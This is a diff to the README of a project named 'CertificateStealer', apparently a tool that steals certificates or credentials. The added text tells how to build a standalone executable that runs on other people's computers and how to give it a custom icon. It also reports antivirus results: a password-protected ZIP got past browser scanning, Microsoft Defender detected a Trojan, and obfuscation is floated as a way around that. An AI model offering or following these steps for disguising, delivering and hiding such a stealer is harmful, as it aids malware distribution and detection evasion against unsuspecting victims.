Lubos-source/CertificateStealer/README.md

 - add to PATH `setx /M PATH "%PATH%;C:\curl"` (need admin rights not cleaver, must be run as ADMIN)
 - reopen cmd and it can be used :)

+## Build .exe program one clik run:

+- Need to modify Visual Studio settings.
+- Switch to "Release"
+- Go to configuration
+- Project Properties -> C/C++ -> Code Generation
+- Here change "Runtime Library" to "/MT Multi-threaded" for static building (it will include all needed C++ libs in .exe, which will cause running on computer without instaled Visual Studio.)
+- Then Folder Release is created, just file .exe is needed (file .pdb is for handing errors like programer/developer, not needed for users.)
+- Wrap Release folder and send --> Woala Program is working on other computer.

+### Add own icon:
+- Used "Resource Hacker".
+- Load .exe file.
+- In tree select "Icon / Icon Group" and replace it.
+- If there is not Icon in tree  structure -> add new Binary, select .ico file, rename *.ico and select it is Icon/ Icon Group.
+- Save / or Save as to apply chnages, now the .exe has your icon and code is not corupted.

+## Antivirus testing:

+- Browsers                              ✅      -> added password to ZIP
+- Microsoft Defender                    ❌      -> detected Trojan (try to obfuscate code?)
+- ...                                   ❌      ->
+- ...                                   ❌      ->

+# Finall:

+- Finall executable application is built in folder `finall`